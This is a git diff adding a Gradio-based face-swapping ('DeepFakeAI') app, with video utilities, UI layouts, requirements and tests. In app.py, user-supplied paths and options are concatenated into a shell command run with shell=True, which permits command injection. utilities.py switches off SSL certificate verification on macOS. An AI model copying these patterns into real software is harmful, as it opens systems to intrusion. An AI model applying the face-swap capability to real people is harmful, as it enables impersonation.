'*neutral_50', + block_label_text_size = '*text_sm', + block_title_text_size = '*text_sm' + ) + + +def get_component(name: ComponentName) -> Optional[Component]: + if name in COMPONENTS: + return COMPONENTS[name] + return None + + +def register_component(name: ComponentName, component: Component) -> None: + COMPONENTS[name] = component + + +def normalize_frame(frame : Frame) -> Frame: + return cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) diff --git a/DeepFakeAI/uis/layouts/__pycache__/default.cpython-310.pyc b/DeepFakeAI/uis/layouts/__pycache__/default.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..89ffca297f794b12dd76d9df628cfb2e9d0e2730 Binary files /dev/null and b/DeepFakeAI/uis/layouts/__pycache__/default.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/layouts/benchmark.py b/DeepFakeAI/uis/layouts/benchmark.py new file mode 100644 index 0000000000000000000000000000000000000000..f58e47a7a0dc5b681fa78a0276df1b482c8c532d --- /dev/null +++ b/DeepFakeAI/uis/layouts/benchmark.py @@ -0,0 +1,37 @@ +import gradio + +from DeepFakeAI.uis.components import about, processors, execution, benchmark +from DeepFakeAI.utilities import conditional_download + + +def pre_check() -> bool: + conditional_download('.assets/examples', + [ + 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/source.jpg', + 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/target-240p.mp4', + 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/target-360p.mp4', + 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/target-540p.mp4', + 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/target-720p.mp4', + 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/target-1080p.mp4', + 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/target-1440p.mp4', + 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/target-2160p.mp4' + ]) + return True + + +def render() -> gradio.Blocks: + with gradio.Blocks() as layout: + with gradio.Row(): + with gradio.Column(scale = 2): + about.render() + processors.render() + execution.render() + with gradio.Column(scale= 5): + benchmark.render() + return layout + + +def listen() -> None: + processors.listen() + execution.listen() + benchmark.listen() diff --git a/DeepFakeAI/uis/layouts/default.py b/DeepFakeAI/uis/layouts/default.py new file mode 100644 index 0000000000000000000000000000000000000000..250e56c7f68f375dd8eb9dac69320aeb1723cce1 --- /dev/null +++ b/DeepFakeAI/uis/layouts/default.py @@ -0,0 +1,44 @@ +import gradio + +from DeepFakeAI.uis.components import about, processors, execution, temp_frame, settings, source, target, preview, trim_frame, face_analyser, face_selector, output_settings, output + + +def pre_check() -> bool: + return True + + +def render() -> gradio.Blocks: + with gradio.Blocks() as layout: + with gradio.Row(): + with gradio.Column(scale = 2): + about.render() + processors.render() + execution.render() + temp_frame.render() + settings.render() + with gradio.Column(scale = 2): + source.render() + target.render() + output_settings.render() + output.render() + with gradio.Column(scale = 3): + #preview.render() + trim_frame.render() + face_selector.render() + face_analyser.render() + return layout + + +def listen() -> None: + processors.listen() + execution.listen() + settings.listen() + temp_frame.listen() + source.listen() + target.listen() + #preview.listen() + trim_frame.listen() + face_selector.listen() + face_analyser.listen() + output_settings.listen() + output.listen() diff --git a/DeepFakeAI/uis/typing.py b/DeepFakeAI/uis/typing.py new file mode 100644 index 0000000000000000000000000000000000000000..4abe384f07c4b90504e47291674905f85a5b8f52 --- /dev/null +++ b/DeepFakeAI/uis/typing.py @@ -0,0 +1,18 @@ +from typing import Literal, Dict, Any +import gradio + +Component = gradio.File or gradio.Image or gradio.Video or gradio.Slider +ComponentName = Literal\ +[ + 'source_file', + 'target_file', + 'preview_frame_slider', + 'face_recognition_dropdown', + 'reference_face_position_gallery', + 'reference_face_distance_slider', + 'face_analyser_direction_dropdown', + 'face_analyser_age_dropdown', + 'face_analyser_gender_dropdown', + 'frame_processors_checkbox_group' +] +Update = Dict[Any, Any] diff --git a/DeepFakeAI/utilities.py b/DeepFakeAI/utilities.py new file mode 100644 index 0000000000000000000000000000000000000000..dd33cf157f684dc1bad324bca4d9326b8e3f82f2 --- /dev/null +++ b/DeepFakeAI/utilities.py @@ -0,0 +1,190 @@ +import glob +import mimetypes +import os +import platform +import shutil +import ssl +import subprocess +import tempfile +import urllib +from pathlib import Path +from typing import List, Optional + +import onnxruntime +from tqdm import tqdm + +import DeepFakeAI.globals +from DeepFakeAI import wording + +TEMP_DIRECTORY_PATH = os.path.join(tempfile.gettempdir(), 'DeepFakeAI') +TEMP_OUTPUT_NAME = 'temp.mp4' + +# monkey patch ssl +if platform.system().lower() == 'darwin': + ssl._create_default_https_context = ssl._create_unverified_context + + +def run_ffmpeg(args : List[str]) -> bool: + commands = [ 'ffmpeg', '-hide_banner', '-loglevel', 'error' ] + commands.extend(args) + try: + subprocess.check_output(commands, stderr = subprocess.STDOUT) + return True + except subprocess.CalledProcessError: + return False + + +def detect_fps(target_path : str) -> Optional[float]: + commands = [ 'ffprobe', '-v', 'error', '-select_streams', 'v:0', '-show_entries', 'stream=r_frame_rate', '-of', 'default=noprint_wrappers = 1:nokey = 1', target_path ] + output = subprocess.check_output(commands).decode().strip().split('/') + try: + numerator, denominator = map(int, output) + return numerator / denominator + except (ValueError, ZeroDivisionError): + return None + + +def extract_frames(target_path : str, fps : float) -> bool: + temp_directory_path = get_temp_directory_path(target_path) + temp_frame_quality = round(31 - (DeepFakeAI.globals.temp_frame_quality * 0.31)) + trim_frame_start = DeepFakeAI.globals.trim_frame_start + trim_frame_end = DeepFakeAI.globals.trim_frame_end + commands = [ '-hwaccel', 'auto', '-i', target_path, '-q:v', str(temp_frame_quality), '-pix_fmt', 'rgb24', ] + if trim_frame_start is not None and trim_frame_end is not None: + commands.extend([ '-vf', 'trim=start_frame=' + str(trim_frame_start) + ':end_frame=' + str(trim_frame_end) + ',fps=' + str(fps) ]) + elif trim_frame_start is not None: + commands.extend([ '-vf', 'trim=start_frame=' + str(trim_frame_start) + ',fps=' + str(fps) ]) + elif trim_frame_end is not None: + commands.extend([ '-vf', 'trim=end_frame=' + str(trim_frame_end) + ',fps=' + str(fps) ]) + else: + commands.extend([ '-vf', 'fps=' + str(fps) ]) + commands.extend([os.path.join(temp_directory_path, '%04d.' + DeepFakeAI.globals.temp_frame_format)]) + return run_ffmpeg(commands) + + +def create_video(target_path : str, fps : float) -> bool: + temp_output_path = get_temp_output_path(target_path) + temp_directory_path = get_temp_directory_path(target_path) + output_video_quality = round(51 - (DeepFakeAI.globals.output_video_quality * 0.5)) + commands = [ '-hwaccel', 'auto', '-r', str(fps), '-i', os.path.join(temp_directory_path, '%04d.' + DeepFakeAI.globals.temp_frame_format), '-c:v', DeepFakeAI.globals.output_video_encoder ] + if DeepFakeAI.globals.output_video_encoder in [ 'libx264', 'libx265', 'libvpx' ]: + commands.extend([ '-crf', str(output_video_quality) ]) + if DeepFakeAI.globals.output_video_encoder in [ 'h264_nvenc', 'hevc_nvenc' ]: + commands.extend([ '-cq', str(output_video_quality) ]) + commands.extend([ '-pix_fmt', 'yuv420p', '-vf', 'colorspace=bt709:iall=bt601-6-625', '-y', temp_output_path ]) + return run_ffmpeg(commands) + + +def restore_audio(target_path : str, output_path : str) -> None: + fps = detect_fps(target_path) + trim_frame_start = DeepFakeAI.globals.trim_frame_start + trim_frame_end = DeepFakeAI.globals.trim_frame_end + temp_output_path = get_temp_output_path(target_path) + commands = [ '-hwaccel', 'auto', '-i', temp_output_path, '-i', target_path ] + if trim_frame_start is None and trim_frame_end is None: + commands.extend([ '-c:a', 'copy' ]) + else: + if trim_frame_start is not None: + start_time = trim_frame_start / fps + commands.extend([ '-ss', str(start_time) ]) + else: + commands.extend([ '-ss', '0' ]) + if trim_frame_end is not None: + end_time = trim_frame_end / fps + commands.extend([ '-to', str(end_time) ]) + commands.extend([ '-c:a', 'aac' ]) + commands.extend([ '-map', '0:v:0', '-map', '1:a:0', '-y', output_path ]) + done = run_ffmpeg(commands) + if not done: + move_temp(target_path, output_path) + + +def get_temp_frame_paths(target_path : str) -> List[str]: + temp_directory_path = get_temp_directory_path(target_path) + return glob.glob((os.path.join(glob.escape(temp_directory_path), '*.' + DeepFakeAI.globals.temp_frame_format))) + + +def get_temp_directory_path(target_path : str) -> str: + target_name, _ = os.path.splitext(os.path.basename(target_path)) + return os.path.join(TEMP_DIRECTORY_PATH, target_name) + + +def get_temp_output_path(target_path : str) -> str: + temp_directory_path = get_temp_directory_path(target_path) + return os.path.join(temp_directory_path, TEMP_OUTPUT_NAME) + + +def normalize_output_path(source_path : str, target_path : str, output_path : str) -> Optional[str]: + if source_path and target_path and output_path: + source_name, _ = os.path.splitext(os.path.basename(source_path)) + target_name, target_extension = os.path.splitext(os.path.basename(target_path)) + if os.path.isdir(output_path): + return os.path.join(output_path, source_name + '-' + target_name + target_extension) + return output_path + + +def create_temp(target_path : str) -> None: + temp_directory_path = get_temp_directory_path(target_path) + Path(temp_directory_path).mkdir(parents = True, exist_ok = True) + + +def move_temp(target_path : str, output_path : str) -> None: + temp_output_path = get_temp_output_path(target_path) + if os.path.isfile(temp_output_path): + if os.path.isfile(output_path): + os.remove(output_path) + shutil.move(temp_output_path, output_path) + + +def clear_temp(target_path : str) -> None: + temp_directory_path = get_temp_directory_path(target_path) + parent_directory_path = os.path.dirname(temp_directory_path) + if not DeepFakeAI.globals.keep_temp and os.path.isdir(temp_directory_path): + shutil.rmtree(temp_directory_path) + if os.path.exists(parent_directory_path) and not os.listdir(parent_directory_path): + os.rmdir(parent_directory_path) + + +def is_image(image_path : str) -> bool: + if image_path and os.path.isfile(image_path): + mimetype, _ = mimetypes.guess_type(image_path) + return bool(mimetype and mimetype.startswith('image/')) + return False + + +def is_video(video_path : str) -> bool: + if video_path and os.path.isfile(video_path): + mimetype, _ = mimetypes.guess_type(video_path) + return bool(mimetype and mimetype.startswith('video/')) + return False + + +def conditional_download(download_directory_path : str, urls : List[str]) -> None: + if not os.path.exists(download_directory_path): + os.makedirs(download_directory_path) + for url in urls: + download_file_path = os.path.join(download_directory_path, os.path.basename(url)) + if not os.path.exists(download_file_path): + request = urllib.request.urlopen(url) # type: ignore[attr-defined] + total = int(request.headers.get('Content-Length', 0)) + with tqdm(total = total, desc = wording.get('downloading'), unit = 'B', unit_scale = True, unit_divisor = 1024) as progress: + urllib.request.urlretrieve(url, download_file_path, reporthook = lambda count, block_size, total_size: progress.update(block_size)) # type: ignore[attr-defined] + + +def resolve_relative_path(path : str) -> str: + return os.path.abspath(os.path.join(os.path.dirname(__file__), path)) + + +def list_module_names(path : str) -> Optional[List[str]]: + if os.path.exists(path): + files = os.listdir(path) + return [Path(file).stem for file in files if not Path(file).stem.startswith('__')] + return None + + +def encode_execution_providers(execution_providers : List[str]) -> List[str]: + return [execution_provider.replace('ExecutionProvider', '').lower() for execution_provider in execution_providers] + + +def decode_execution_providers(execution_providers : List[str]) -> List[str]: + return [provider for provider, encoded_execution_provider in zip(onnxruntime.get_available_providers(), encode_execution_providers(onnxruntime.get_available_providers())) if any(execution_provider in encoded_execution_provider for execution_provider in execution_providers)] diff --git a/DeepFakeAI/wording.py b/DeepFakeAI/wording.py new file mode 100644 index 0000000000000000000000000000000000000000..1d70363ea7546eeb3b3ec224eb04848db727718e --- /dev/null +++ b/DeepFakeAI/wording.py @@ -0,0 +1,88 @@ +WORDING =\ +{ + 'python_not_supported': 'Python version is not supported, upgrade to {version} or higher', + 'ffmpeg_not_installed': 'FFMpeg is not installed', + 'source_help': 'select a source image', + 'target_help': 'select a target image or video', + 'output_help': 'specify the output file or directory', + 'frame_processors_help': 'choose from the available frame processors (choices: {choices}, ...)', + 'ui_layouts_help': 'choose from the available ui layouts (choices: {choices}, ...)', + 'keep_fps_help': 'preserve the frames per second (fps) of the target', + 'keep_temp_help': 'retain temporary frames after processing', + 'skip_audio_help': 'omit audio from the target', + 'face_recognition_help': 'specify the method for face recognition', + 'face_analyser_direction_help': 'specify the direction used for face analysis', + 'face_analyser_age_help': 'specify the age used for face analysis', + 'face_analyser_gender_help': 'specify the gender used for face analysis', + 'reference_face_position_help': 'specify the position of the reference face', + 'reference_face_distance_help': 'specify the distance between the reference face and the target face', + 'reference_frame_number_help': 'specify the number of the reference frame', + 'trim_frame_start_help': 'specify the start frame for extraction', + 'trim_frame_end_help': 'specify the end frame for extraction', + 'temp_frame_format_help': 'specify the image format used for frame extraction', + 'temp_frame_quality_help': 'specify the image quality used for frame extraction', + 'output_video_encoder_help': 'specify the encoder used for the output video', + 'output_video_quality_help': 'specify the quality used for the output video', + 'max_memory_help': 'specify the maximum amount of ram to be used (in gb)', + 'execution_providers_help': 'choose from the available execution providers (choices: {choices}, ...)', + 'execution_thread_count_help': 'specify the number of execution threads', + 'execution_queue_count_help': 'specify the number of execution queries', + 'creating_temp': 'Creating temporary resources', + 'extracting_frames_fps': 'Extracting frames with {fps} FPS', + 'processing': 'Processing', + 'downloading': 'Downloading', + 'temp_frames_not_found': 'Temporary frames not found', + 'creating_video_fps': 'Creating video with {fps} FPS', + 'creating_video_failed': 'Creating video failed', + 'skipping_audio': 'Skipping audio', + 'restoring_audio': 'Restoring audio', + 'clearing_temp': 'Clearing temporary resources', + 'processing_image_succeed': 'Processing to image succeed', + 'processing_image_failed': 'Processing to image failed', + 'processing_video_succeed': 'Processing to video succeed', + 'processing_video_failed': 'Processing to video failed', + 'select_image_source': 'Select an image for source path', + 'select_image_or_video_target': 'Select an image or video for target path', + 'no_source_face_detected': 'No source face detected', + 'frame_processor_not_loaded': 'Frame processor {frame_processor} could not be loaded', + 'frame_processor_not_implemented': 'Frame processor {frame_processor} not implemented correctly', + 'ui_layout_not_loaded': 'UI layout {ui_layout} could not be loaded', + 'ui_layout_not_implemented': 'UI layout {ui_layout} not implemented correctly', + 'start_button_label': 'START', + 'clear_button_label': 'CLEAR', + 'benchmark_result_dataframe_label': 'BENCHMARK RESULT', + 'benchmark_cycles_slider_label': 'BENCHMARK CYCLES', + 'execution_providers_checkbox_group_label': 'EXECUTION PROVIDERS', + 'execution_thread_count_slider_label': 'EXECUTION THREAD COUNT', + 'execution_queue_count_slider_label': 'EXECUTION QUEUE COUNT', + 'face_analyser_direction_dropdown_label': 'FACE ANALYSER DIRECTION', + 'face_analyser_age_dropdown_label': 'FACE ANALYSER AGE', + 'face_analyser_gender_dropdown_label': 'FACE ANALYSER GENDER', + 'reference_face_gallery_label': 'REFERENCE FACE', + 'face_recognition_dropdown_label': 'FACE RECOGNITION', + 'reference_face_distance_slider_label': 'REFERENCE FACE DISTANCE', + 'output_image_or_video_label': 'OUTPUT', + 'output_video_encoder_dropdown_label': 'OUTPUT VIDEO ENCODER', + 'output_video_quality_slider_label': 'OUTPUT VIDEO QUALITY', + 'preview_image_label': 'PREVIEW', + 'preview_frame_slider_label': 'PREVIEW FRAME', + 'frame_processors_checkbox_group_label': 'FRAME PROCESSORS', + 'keep_fps_checkbox_label': 'KEEP FPS', + 'keep_temp_checkbox_label': 'KEEP TEMP', + 'skip_audio_checkbox_label': 'SKIP AUDIO', + 'temp_frame_format_dropdown_label': 'TEMP FRAME FORMAT', + 'temp_frame_quality_slider_label': 'TEMP FRAME QUALITY', + 'trim_frame_start_slider_label': 'TRIM FRAME START', + 'trim_frame_end_slider_label': 'TRIM FRAME END', + 'source_file_label': 'SOURCE', + 'target_file_label': 'TARGET', + 'point': '.', + 'comma': ',', + 'colon': ':', + 'question_mark': '?', + 'exclamation_mark': '!' +} + + +def get(key : str) -> str: + return WORDING[key] diff --git a/README.md b/README.md index b10d9d5d070f85ae08a7912f4c5757675f4482bb..6751bbd7ce54901de87ee9e0a5aaaac37473e71a 100644 --- a/README.md +++ b/README.md @@ -1,13 +1,14 @@ --- -title: DeepFakeAI V1 -emoji: 👀 -colorFrom: gray -colorTo: pink +title: DeepFakeAI +emoji: ⚡ +colorFrom: red +colorTo: gray sdk: gradio -sdk_version: 4.25.0 +sdk_version: 3.41.0 app_file: app.py pinned: false license: mit +short_description: Next generation image and video face swapper --- -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference +Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference \ No newline at end of file diff --git a/READMET.md b/READMET.md new file mode 100644 index 0000000000000000000000000000000000000000..d748d8998dfc8f6c389412ef331659da46e7f9dd --- /dev/null +++ b/READMET.md @@ -0,0 +1,11 @@ +--- +title: DeepFakeAI +emoji: 🌍 +colorFrom: yellow +colorTo: purple +sdk: static +pinned: false +license: mit +--- + +Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/app.py b/app.py new file mode 100644 index 0000000000000000000000000000000000000000..c174844feea7c6b9f64aae6af2e7a5a2ffa1d560 --- /dev/null +++ b/app.py @@ -0,0 +1,167 @@ +import gradio as gr +import subprocess as sp +import os +import uuid +import time +import shutil + +os.makedirs("./output", exist_ok=True) + +def run(*args): + source, target, unique_id, *rest_args = args + if not os.path.exists(source): + return "Source file does not exist" + if not os.path.exists(target): + return "Target file does not exist" + remove_old_directories("./output", num_minutes=60) + filename = os.path.basename(target) + os.makedirs(f"./output/{unique_id}",exist_ok=True) + output = f"./output/{unique_id}/{filename}" + frame_processor = rest_args[0] + selected_frame_processors = ' '.join(frame_processor) + + face_analyser_direction = rest_args[1] + face_recognition = rest_args[2] + face_analyser_gender = rest_args[3] + + cmd = ( + f"python run.py --execution-providers cpu -s {source} -t {target} -o {output} " + f"--frame-processors {selected_frame_processors} " + f"--face-analyser-direction {face_analyser_direction} " + ) + if face_recognition != 'none': + cmd += f"--face-recognition {face_recognition} " + if face_analyser_gender != 'none': + cmd += f"--face-analyser-gender {face_analyser_gender} " + + if len(rest_args) > 4: + skip_audio = rest_args[4] + keep_fps = rest_args[5] + keep_temp = rest_args[6] + if skip_audio: + cmd += "--skip-audio " + if keep_fps: + cmd += "--keep-fps " + if keep_temp: + cmd += "--keep-temp " + + try: + print("Started...", cmd) + output_text = sp.run(cmd, shell=True, capture_output=True, text=True).stdout + print(output_text) + return output + except Exception as e: + return f"An error occurred: {str(e)}" + +def clear_output(unique_id): + try: + output_path = f"./output/{unique_id}" + if os.path.exists(output_path): + print("Trying to delete ") + for filename in os.listdir(output_path): + file_path = os.path.join(output_path, filename) + if os.path.isfile(file_path): + os.remove(file_path) + print(f"Output files in {output_path} are deleted") + return "Output files for unique_id deleted" + else: + print(f"Output files in {output_path} does not exist") + return "Output directory for (output_path} does not exist" + except Exception as e: + return f"An error occurred: {str(e)}" + +def remove_old_directories(directory, num_minutes=60): + now = time.time() + + for r, d, f in os.walk(directory): + for dir_name in d: + dir_path = os.path.join(r, dir_name) + timestamp = os.path.getmtime(dir_path) + age_minutes = (now - timestamp) / 60 # Convert to minutes + + if age_minutes >= num_minutes: + try: + print("Removing", dir_path) + shutil.rmtree(dir_path) + print("Directory removed:", dir_path) + except Exception as e: + print(e) + pass + + +def get_theme() -> gr.Theme: + return gr.themes.Soft( + primary_hue = gr.themes.colors.red, + secondary_hue = gr.themes.colors.gray, + font = gr.themes.GoogleFont('Inter') + ).set( + background_fill_primary = '*neutral_50', + block_label_text_size = '*text_sm', + block_title_text_size = '*text_sm' + ) + +with gr.Blocks(theme=get_theme(), title="DeepFakeAI 1.0.0") as ui: + with gr.Box(): + gr.HTML('
DeepFakeAI 1.0.1
') + + with gr.Box(): + with gr.Column(scale=3): + frame_processor_checkbox = gr.CheckboxGroup( + choices = ['face_swapper', 'face_enhancer', 'frame_enhancer'], + label = 'FRAME PROCESSORS', + value = ['face_swapper'] # Default value + ) + + + with gr.Box(): + with gr.Column(scale=3): + face_analyser_direction_dropdown = gr.Dropdown( + label = 'FACE ANALYSER DIRECTION', + choices = ['left-right', 'right-left', 'top-bottom', 'bottom-top', 'small-large', 'large-small'], + value = 'left-right' + ) + face_analyser_age_dropdown = gr.Dropdown( + label = 'FACE RECOGNITION', + choices = ['none'] + ['reference', 'many'], + value = 'reference' + ) + face_analyser_gender_dropdown = gr.Dropdown( + label = 'FACE ANALYSER GENDER', + choices = ['none'] + ['male', 'female'], + value = 'none' + ) + unique_id = gr.Textbox(value=str(uuid.uuid4()), visible=False) + with gr.Tab("Image: "): + source_image = gr.Image(type="filepath", label="SOURCE IMAGE") + target_image = gr.Image(type="filepath", label="TARGET IMAGE") + image_button = gr.Button("START") + clear_button = gr.ClearButton(value="CLEAR") + image_output = gr.Image(label="OUTPUT") + clear_button.add(image_output) + + image_button.click( + run, + inputs=[source_image, target_image, unique_id, frame_processor_checkbox, face_analyser_direction_dropdown, face_analyser_age_dropdown, face_analyser_gender_dropdown], + outputs=image_output + ) + clear_button.click(fn=clear_output, inputs=unique_id) + + with gr.Tab("Video: "): + source_image_video = gr.Image(type="filepath", label="SOURCE IMAGE") + target_video = gr.Video(label="TARGET VIDEO") + with gr.Box(): + skip_audio = gr.Checkbox(label="SKIP AUDIO") + keep_fps = gr.Checkbox(label="KEEP FPS") + keep_temp = gr.Checkbox(label="KEEP TEMP") + video_button = gr.Button("START") + clear_video_button = gr.ClearButton(value="CLEAR") + video_output = gr.Video(label="OUTPUT") + clear_video_button.add(video_output) + video_button.click( + run, + inputs=[source_image_video, target_video, unique_id, frame_processor_checkbox, face_analyser_direction_dropdown, face_analyser_age_dropdown, face_analyser_gender_dropdown, skip_audio, keep_fps, keep_temp], + outputs=video_output + ) + clear_video_button.click(fn=clear_output, inputs=unique_id) + +ui.launch(debug=True) \ No newline at end of file diff --git a/del.py b/del.py new file mode 100644 index 0000000000000000000000000000000000000000..d0e8f29496fc132c2c04590b0b37e365a2664817 --- /dev/null +++ b/del.py @@ -0,0 +1,9 @@ +import shutil +import gradio as gr + +def delt(text): + txt = text + shutil.rmtree("./output") + return "Removed successfully..." + +gr.Interface(delt, "text","text").launch(debug=True) \ No newline at end of file diff --git a/gfpgan/weights/detection_Resnet50_Final.pth b/gfpgan/weights/detection_Resnet50_Final.pth new file mode 100644 index 0000000000000000000000000000000000000000..16546738ce0a00a9fd47585e0fc52744d31cc117 --- /dev/null +++ b/gfpgan/weights/detection_Resnet50_Final.pth @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6d1de9c2944f2ccddca5f5e010ea5ae64a39845a86311af6fdf30841b0a5a16d +size 109497761 diff --git a/gfpgan/weights/parsing_parsenet.pth b/gfpgan/weights/parsing_parsenet.pth new file mode 100644 index 0000000000000000000000000000000000000000..1ac2efc50360a79c9905dbac57d9d99cbfbe863c --- /dev/null +++ b/gfpgan/weights/parsing_parsenet.pth @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3d558d8d0e42c20224f13cf5a29c79eba2d59913419f945545d8cf7b72920de2 +size 85331193 diff --git a/mypy.ini b/mypy.ini new file mode 100644 index 0000000000000000000000000000000000000000..64218bc23688632a08c98ec4a0451ed46f8ed5e5 --- /dev/null +++ b/mypy.ini @@ -0,0 +1,7 @@ +[mypy] +check_untyped_defs = True +disallow_any_generics = True +disallow_untyped_calls = True +disallow_untyped_defs = True +ignore_missing_imports = True +strict_optional = False diff --git a/requirements-ci.txt b/requirements-ci.txt new file mode 100644 index 0000000000000000000000000000000000000000..f381ae5dc8bd37823ff98638ff252be9bbce8eec --- /dev/null +++ b/requirements-ci.txt @@ -0,0 +1,11 @@ +insightface==0.7.3 +numpy==1.24.3 +onnx==1.14.0 +onnxruntime==1.15.1 +opencv-python==4.8.0.74 +opennsfw2==0.10.2 +protobuf==4.23.4 +pytest==7.4.0 +psutil==5.9.5 +tensorflow==2.13.0 +tqdm==4.65.0 diff --git a/requirements.txt b/requirements.txt new file mode 100644 index 0000000000000000000000000000000000000000..56c15587e36e0caad4e8d2b3fe939a57b52135bd --- /dev/null +++ b/requirements.txt @@ -0,0 +1,20 @@ +--extra-index-url https://download.pytorch.org/whl/cu118 +pysqlite3 +python-telegram-bot +gfpgan==1.3.8 +gradio==3.40.1 +insightface==0.7.3 +numpy==1.24.3 +onnx==1.14.0 +onnxruntime==1.15.1; python_version != '3.9' and sys_platform == 'darwin' and platform_machine != 'arm64' +onnxruntime-coreml==1.13.1; python_version == '3.9' and sys_platform == 'darwin' and platform_machine != 'arm64' +onnxruntime-gpu==1.15.1; sys_platform != 'darwin' +onnxruntime-silicon==1.13.1; sys_platform == 'darwin' and platform_machine == 'arm64' +opencv-python==4.8.0.74 +opennsfw2==0.10.2 +pillow==10.0.0 +protobuf==4.23.4 +psutil==5.9.5 +realesrgan==0.3.0 +tensorflow==2.13.0 +tqdm==4.65.0 diff --git a/run.py b/run.py new file mode 100644 index 0000000000000000000000000000000000000000..11500cdc86edf1a68cf1c53b78d4e7e01a6393c4 --- /dev/null +++ b/run.py @@ -0,0 +1,6 @@ +#!/usr/bin/env python3 + +from DeepFakeAI import core + +if __name__ == '__main__': + core.run() diff --git a/tests/__init__.py b/tests/__init__.py new file mode 100644 index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 diff --git a/tests/test_cli.py b/tests/test_cli.py new file mode 100644 index 0000000000000000000000000000000000000000..266116e302e19dd4602df71cbe4bd2440cf2513c --- /dev/null +++ b/tests/test_cli.py @@ -0,0 +1,31 @@ +import subprocess +import pytest + +from DeepFakeAI import wording +from DeepFakeAI.utilities import conditional_download + + +@pytest.fixture(scope = 'module', autouse = True) +def before_all() -> None: + conditional_download('.assets/examples', + [ + 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/source.jpg', + 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/target-1080p.mp4' + ]) + subprocess.run([ 'ffmpeg', '-i', '.assets/examples/target-1080p.mp4', '-vframes', '1', '.assets/examples/target-1080p.jpg' ]) + + +def test_image_to_image() -> None: + commands = [ 'python', 'run.py', '-s', '.assets/examples/source.jpg', '-t', '.assets/examples/target-1080p.jpg', '-o', '.assets/examples' ] + run = subprocess.run(commands, stdout = subprocess.PIPE) + + assert run.returncode == 0 + assert wording.get('processing_image_succeed') in run.stdout.decode() + + +def test_image_to_video() -> None: + commands = [ 'python', 'run.py', '-s', '.assets/examples/source.jpg', '-t', '.assets/examples/target-1080p.mp4', '-o', '.assets/examples', '--trim-frame-end', '10' ] + run = subprocess.run(commands, stdout = subprocess.PIPE) + + assert run.returncode == 0 + assert wording.get('processing_video_succeed') in run.stdout.decode() diff --git a/tests/test_utilities.py b/tests/test_utilities.py new file mode 100644 index 0000000000000000000000000000000000000000..e503e74378796c8bf9c4d9d2f6bc077c4e593b39 --- /dev/null +++ b/tests/test_utilities.py @@ -0,0 +1,107 @@ +import glob +import subprocess +import pytest + +import DeepFakeAI.globals +from DeepFakeAI.utilities import conditional_download, detect_fps, extract_frames, create_temp, get_temp_directory_path, clear_temp + + +@pytest.fixture(scope = 'module', autouse = True) +def before_all() -> None: + DeepFakeAI.globals.temp_frame_quality = 100 + DeepFakeAI.globals.trim_frame_start = None + DeepFakeAI.globals.trim_frame_end = None + DeepFakeAI.globals.temp_frame_format = 'png' + conditional_download('.assets/examples', + [ + 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/target-240p.mp4' + ]) + subprocess.run([ 'ffmpeg', '-i', '.assets/examples/target-240p.mp4', '-vf', 'fps=25', '.assets/examples/target-240p-25fps.mp4' ]) + subprocess.run([ 'ffmpeg', '-i', '.assets/examples/target-240p.mp4', '-vf', 'fps=30', '.assets/examples/target-240p-30fps.mp4' ]) + subprocess.run([ 'ffmpeg', '-i', '.assets/examples/target-240p.mp4', '-vf', 'fps=60', '.assets/examples/target-240p-60fps.mp4' ]) + + +@pytest.fixture(scope = 'function', autouse = True) +def before_each() -> None: + DeepFakeAI.globals.trim_frame_start = None + DeepFakeAI.globals.trim_frame_end = None + DeepFakeAI.globals.temp_frame_quality = 90 + DeepFakeAI.globals.temp_frame_format = 'jpg' + + +def test_detect_fps() -> None: + assert detect_fps('.assets/examples/target-240p-25fps.mp4') == 25.0 + assert detect_fps('.assets/examples/target-240p-30fps.mp4') == 30.0 + assert detect_fps('.assets/examples/target-240p-60fps.mp4') == 60.0 + + +def test_extract_frames() -> None: + target_paths =\ + [ + '.assets/examples/target-240p-25fps.mp4', + '.assets/examples/target-240p-30fps.mp4', + '.assets/examples/target-240p-60fps.mp4' + ] + for target_path in target_paths: + temp_directory_path = get_temp_directory_path(target_path) + create_temp(target_path) + + assert extract_frames(target_path, 30.0) is True + assert len(glob.glob1(temp_directory_path, '*.jpg')) == 324 + + clear_temp(target_path) + + +def test_extract_frames_with_trim_start() -> None: + DeepFakeAI.globals.trim_frame_start = 224 + data_provider =\ + [ + ('.assets/examples/target-240p-25fps.mp4', 55), + ('.assets/examples/target-240p-30fps.mp4', 100), + ('.assets/examples/target-240p-60fps.mp4', 212) + ] + for target_path, frame_total in data_provider: + temp_directory_path = get_temp_directory_path(target_path) + create_temp(target_path) + + assert extract_frames(target_path, 30.0) is True + assert len(glob.glob1(temp_directory_path, '*.jpg')) == frame_total + + clear_temp(target_path) + + +def test_extract_frames_with_trim_start_and_trim_end() -> None: + DeepFakeAI.globals.trim_frame_start = 124 + DeepFakeAI.globals.trim_frame_end = 224 + data_provider =\ + [ + ('.assets/examples/target-240p-25fps.mp4', 120), + ('.assets/examples/target-240p-30fps.mp4', 100), + ('.assets/examples/target-240p-60fps.mp4', 50) + ] + for target_path, frame_total in data_provider: + temp_directory_path = get_temp_directory_path(target_path) + create_temp(target_path) + + assert extract_frames(target_path, 30.0) is True + assert len(glob.glob1(temp_directory_path, '*.jpg')) == frame_total + + clear_temp(target_path) + + +def test_extract_frames_with_trim_end() -> None: + DeepFakeAI.globals.trim_frame_end = 100 + data_provider =\ + [ + ('.assets/examples/target-240p-25fps.mp4', 120), + 